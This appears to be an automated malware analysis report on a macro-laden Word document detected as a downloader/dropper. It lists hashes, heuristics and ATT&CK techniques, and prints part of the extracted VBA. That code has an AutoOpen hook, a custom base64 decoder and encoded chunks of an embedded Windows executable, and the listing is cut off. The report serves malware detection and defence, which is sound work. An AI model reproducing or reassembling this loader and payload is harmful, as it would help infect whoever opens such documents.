Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5766758c51c678d7…

MALICIOUS

Office (OOXML)

66.6 KB Created: 2019-12-24 21:03:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-07
MD5: 0a222cc47b33e66646781732d40009a8 SHA-1: df6619f7ace034bd7109e4fddb48a71282152d1e SHA-256: 5766758c51c678d7f26a68947be2352ee091773239c4ffbbd62ed72cfbd8afdf
312 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is an OOXML document containing a VBA project with an AutoOpen macro. Heuristics indicate an obfuscated auto-exec loader that uses CreateObject/Shell/exec, and a lure to enable macros. The AutoOpen macro calls a function 'cute', which likely decodes and executes a payload. The presence of the 'macros.bas' and 'vbaProject_00.bin' files further supports this. The ClamAV detection 'Doc.Dropper.Downloader-6398288-0' confirms its nature as a downloader.

Heuristics 9

  • ClamAV: Doc.Dropper.Downloader-6398288-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Downloader-6398288-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 34205 bytes
SHA-256: 31dcbdbdf3adb8a5f2dfef8bb64ede69c812ac84bb86001f25affc08633ab579
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 53 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoOpen()
    Call cute
End Sub

Private Function eco(ase) As Byte()
    Const able = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

    If 0 <> Len(ase) Mod 4 Then
        Exit Function
    End If

    utL = (Len(ase) / 4) * 3
    If "=" = Mid(ase, Len(ase), 1) Then
        utL = utL - 1
    End If
    If "=" = Mid(ase, Len(ase) - 1, 1) Then
        utL = utL - 1
    End If

    Dim ecoytes() As Byte
    ReDim ecoytes(utL - 1)
    utp = 0

    For quartet = 1 To Len(ase) Step 4
        umber = 0
        Const base = 64
        esIn = 3
        For i = 0 To 3
            inar = Mid(ase, quartet + i, 1)
            iale = 0

            If "=" = inar Then
                esIn = esIn - 1
            Else
                iale = InStr(1, able, inar, vbBinaryCompare) - 1
            End If

            If -1 = iale Then
                Exit Function
            End If

            umber = (umber * base) + iale
        Next

        umber = Hex(umber)

        umber = String(6 - Len(umber), "0") & umber

        ecoytes(utp) = CByte("&H" & Mid(umber, 1, 2))
        utp = utp + 1
        If esIn > 1 Then
            ecoytes(utp) = CByte("&H" & Mid(umber, 3, 2))
            utp = utp + 1
            If esIn > 2 Then
                ecoytes(utp) = CByte("&H" & Mid(umber, 5, 2))
                utp = utp + 1
            End If
        End If
    Next

    eco = ecoytes
End Function

Private Function get_Top() As String
    Dim Top1 As String
    Dim Top2 As String
    Dim Top3 As String
    Top1 = "TVqQAAMAAAAEAAAA--8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD2Dg8Csm9hUbJvYVGyb2FRuxfyUbpvYVG5AGRQom9hUbkAZVC5b2FRuQBiULBvYVG5AGBQ"
    Top2 = "tm9hUekHZVCwb2FR6QdgULVvYVGyb2BR829hUXQAaFCwb2FRdABhULNvYVF0AJ5Rs29hUXQAY1Czb2FRUmljaLJvYVEAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQDylgxfAAAAAAAAAADgAAIhCwEOGQAoAAAAHgAAAAAAAEArAAAAEAAAAEAAAAAAABAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAkAAAAAQAAAAAAAADAEAB"
    Top3 = "AAAQAAAQAAAAABAAABAAAAAAAAAQAAAAYEoAAFAAAACwSgAAyAAAAABwAADgAQAAAAAAAAAAAAAAAAAAAAAAAACAAACwAgAAwEMAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4QwAAQAAAAAAAAAAAAAAAAEAAAAQBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAB0nAAAAEAAAACgAAAAEAAAAAAAA"
    get_Top = Top1 + Top2 + Top3
End Function

Private Function get_oop() As String
    Dim oop1 As String
    Dim oop2 As String
    Dim oop3 As String
    oop1 = "AAAAAAAAAAAgAABgLnJkYXRhAAB2EQAAAEAAAAASAAAALAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAFAQAAABgAAAAAgAAAD4AAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAOABAAAAcAAAAAIAAABAAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAACwAgAAAIAAAAAEAAAAQgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAA"
    oop2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    oop3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGpkaFhIABDopCUAAIvai-Ez-4l93Il91Il94Il9zIl90Ff-FfhAABCJffyNRdhQaChBABBqAVdo"
    get_oop = oop1 + oop2 + oop3
End Function

Private Function get_yes() As String
    Dim yes1 As String
    Dim yes2 As String
    Dim yes3 As String
    yes1 = "OEEAEP8V9EAAEIXAdCVq-o1N8FFoBGAAEOi0JQAAg8QMsAGLTfBkiQ0AAAAAWV9eW8nDaghYZolFvIl1xItF2IsIjVXcUoPsEI11vIv8paWlpVD-USSDfdwAdRGLRdiLCFD-UQhq-o1F8FDrp2oIWGaJRayJXbSLRdiLCI1V1FKD7BCNdayL-KWlpaVQ-1Eki0XciwiDfdQAdQZQ-1EI67uNVdBSUP9RLItN0IXJdRCLRdSL"
    yes2 = "CFD-UQiLRdyLCOvbiwGNVeBSUf9QHItF0IsIg33gAX05UP9RCItF1IsIUP9RCItF3IsIUP9RCItF2Is
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 128000 bytes
SHA-256: a72d9038443a02f637fddc3e9b638d90756d158f70d853b0ecbcc2c35a7423bf
Detection
ClamAV: Doc.Dropper.Downloader-6398288-0
Obfuscation or payload: likely
Carved artifact contains 149 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.